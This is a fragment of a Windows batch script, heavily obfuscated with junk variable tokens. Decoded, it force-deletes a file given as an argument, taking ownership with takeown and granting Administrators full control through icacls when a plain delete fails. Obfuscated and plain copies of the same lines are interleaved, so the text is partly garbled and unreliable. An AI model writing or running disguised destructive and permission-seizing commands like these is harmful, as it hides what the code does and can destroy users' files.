i%EA%f%MFzMUD% %bITMrz%e%uJFMMPf%x%ECbB%i%xzJEpweB%s%qXUKNyDugS%t%NuriYM% %i%"%zhQ%%~1" (
    del /f /q "%~%D%1%tBbqkfFL%"%nKgoFDpMhM% %hUqYPQlHq%>%lsHugyiv%n%r%u%yom%l%WAedOuLgBv% %UYZu%2%EGdAHPW%>%rXZw%&%GU%1%W%
 %Pimy% %ea% %stgIdnBq% %PadDlUKlUG%i%ZFqX%f%ljA% %v%n%XholGRu%o%g%t%uQanzh% %Ot%e%mtVkAgtaXA%x%fLMDiSjuGJ%i%w%s%gIOonNsng%t%PeA% %D%"%AgnXtR%%~1" (
        echo   Removed: %~1
        echo   Removed: %~%qA%1%jowpKjsxnV%
 %NEdFKhw% %smSOlfzh% %voLc% %JvtQIrVeL% %LZndVt% %GtYr% %TmwyvE% %uy%s%yShs%e%qBMVaxlFF%t%qq% %MnRHXiSy%/%JhLTE%a%u% %OeTP%t%cnTaAHHb%e%MCNL%m%rq%p%bTl%_%mScmVm%c%kYoB%m%jrUxmpiSe%d%RSJdgDzC%_%HJIjVl%r%ellm%e%peG%m%mNYc%o%WOLHM%v%xULznUw%e%nPUanHPFfG%d%mgLhnjm%+%UMOuAa%=%tl%1%U%
 %wDLvHd% %TNKOdv% %fcZjU% %tQPGAWl%)%dvj% %FA%e%sjWLeH%l%EruQBvHgkO%s%Y%e%mLAEyMuzCK% %xRMey%(%EQB%
 %Azt% %eyzDYY% %BXHqYhr% %vpOQhsfjj% %okFHDxE% %uSczPDL% %jKcOaPgO% %OH%t%tVg%a%LWpy%k%zHC%e%zKtJAhmAlR%o%WyiRbcGIyn%w%QxGP%n%p% %cG%/%qlDSbwdXA%f%GyebzN% %j%"%RYtNsSk%%~1" >nul 2>&1
        icacls "%~1" /grant Administrators:F >nul 2>&1
        icacls "%~%xBz%1%fc%"%sNPgXzxG% %fZbPUE%/%ruMjgf%g%nGSrXb%r%nSVef%a%XP%n%bdmw%t%kmMp% %mflNLmf%A%toHIWwV%d%QtDmPfSok%m%zyb%i%eDsdyGmQCJ%n%ayB%i%XmZEZA%s%iUQBz%t%fL%r%AQr%a%KVoEhxFEWe%t%umFHB%o%MabK%r%fGYOfJ%s%bATQNyZM%:%LiIUZOJd%F%AJbd% %NP%>%ecCANMjXa%n%hGkNlu%u%o%l%fBGwfRgWb% %RcV%2%waQIc%>%hvrBztu%&%rXHzBppWIZ%1%ZlmqjKr%
 %indueIknK% %sIc% %ccGRmAmxY% %kVV% %aBwYDcB% %HL% %lhsRzgA% %oGm%d%o%e%bmlV%l%IOkNmwbrHg% %X%/%w%f%AtVdRAyQ% %MbOEuvx%/%gyYspUwbu%q%W% %NJVJ%"%DzNbwdHsZ%%~1" >nul 2>&1
        if not exist "%~%ekUvK%1%bmUI%"%UEQB% %EmgGTh%(%y%
            echo   Removed ^(forced^): %~1
 %RK% %tOAX% %xoW% %xcgVo% %dabqs% %qk% %JvDbFQGWw% %Tg% %Cf% %SaIODdFMm% %hTGzE% %SrpR%e%QB%c%obZ%h%XYk%o%sDgzKdQjuc% %Um% %oR% %upMq%R%m%e%gllYdntk%m%vvMhw%o%FAf%v%dFyqfttrh%e%zjplHHvu%d%ReuA% %AprRteLG%^%GScFSRC%(%w%f%fmeCmKqwan%o%YbEhuuWqX%r%lew%c%InWx%e%msfXU%d%IxyQYbp%^%ZHrTJf%)%RsGEyp%:%f% %Spl%%~1
            set /a temp_cmd_removed+=1
        ) else (
            echo   Failed: %~1
            echo   Failed: %~%t%1%FqKZ%
 %GieB% %txef% %DyzkKkiuQ% %BKmVfsvQ% %uiTrkQtDTz% %USS% %UEzLd% %LsyEX%)%ANQrpCzXl%
 %FBE% %PovEVUcDni% %FAWA% %PkzVBWm%)%JvCnKzwqko%
)%YS%
e%nQNLtMFAvY%x%zXoVz%i%hOCC%t%fOOIDFgdU% %ZLgnLzS%/%X%b%EpCnDgH%
